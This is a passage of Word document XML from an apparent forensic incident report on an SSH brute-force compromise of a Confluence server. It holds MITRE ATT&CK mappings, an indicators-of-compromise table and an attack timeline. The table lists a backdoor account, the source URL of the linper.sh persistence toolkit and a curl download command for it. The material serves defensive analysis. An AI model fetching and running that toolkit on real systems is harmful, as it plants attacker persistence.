                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Abuse Elevation Control (sudo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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5AACDE79">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1548.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="50AE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59D00EA9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Defense Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="545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1D5E7306">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use of Legitimate Tool (curl)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="140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231092BA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="21F29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5F9304B4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="54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1244C867">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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5A853061">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C88C921">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF68D18">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VIII.III  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>INDICATORS OF COMPROMISE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336D78F">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The following indicators were extracted from the auth.log and wtmp artifacts and can be used for detection, blocking, or threat intelligence enrichment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298F3D6">
      <w:pPr>
        <w:spacing w:before="80" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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43"/>
        <w:gridCol w:w="6507"/>
      </w:tblGrid>
      <w:tr w14:paraId="23ABD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1B3A6B" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1B3A6B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="476C9CB6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6250" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1B3A6B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="32140FD1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="32ED7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5ED3823D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attacker IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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462E76FA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>65.2.161.68</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="506F4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608B85E4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Target Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="625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42978D92">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SSH (port 22) on Confluence server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3CEF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32421660">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Compromised Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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16E1D364">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3969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076AB00E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Backdoor Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="625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17CB2CB5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cyberjunkie (added to sudo group)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="71974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0879AFFB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Brute Force Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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33286294">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Session 34 (automated — opened and closed same second)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6AB91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3772644A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Manual Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="625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47953F68">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Session 37 (interactive — opened 06:32:45 UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B32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3F3A1586">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Session End</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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480F9C8C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>06:37:24 UTC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="04900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170ABDF8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Persistence Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="625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09451F04">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>linper.sh (Linux Persistence toolkit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A15E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1C40E828">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Script Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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03A89FE6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="69176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7A06AB85">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Download Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="625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095DA7EF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/usr/bin/curl &lt;script URL&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C70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61518D17">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>MITRE Persistence ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="62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510B367E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1136.001 — Create Account: Local Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F1649DE">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="296B2237">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E4560A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VIII.IV  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ATTACK TIMELINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0B33E">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The table below reconstructs the full attack sequence derived from the auth.log and wtmp artifacts.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="9"/>
        <w:tblW w:w="94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450"/>
      </w:tblGrid>
      <w:tr w14:paraId="2BA47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B3A6B" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1B3A6B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="54A706AB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Time (UTC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7450" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:left w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
              <w:right w:val="single" w:color="1B3A6B" w:sz="6" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1B3A6B"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0BECF84D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="303BC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36826D0E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Prior to 06:31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="74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75750464">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker conducts SSH brute force from 65.2.161.68 against the Confluence server — 165+ failed attempts recorded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4F3B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4B76D1D9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>06:31:33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745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58C2D7DC">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Automated brute force succeeds: root credentials obtained. Session 34 opened and closed within the same second</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C83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6FE4C5BB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>06:32:44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="74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3B628F3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker manually authenticates as root via SSH — password accepted (auth.log)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5A773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26ECF219">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>06:32:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745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5AC31992">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Interactive terminal session established — Session 37 opened (wtmp artifact)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D753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1CCC0437">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>06:32:xx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="74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4E3808D5">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker creates backdoor user account: cyberjunkie. Account added to sudo group for privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="399B5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7D9DBC56">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>06:37:24</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745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36162AE6">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>First SSH session (Session 37) closed — attacker disconnects from root session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C267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7C7C506A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Post 06:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="745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079ACCE8">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3A3A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Attacker logs back in as cyberjunkie using backdoor account</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B36F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4631DA77">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="21"/>
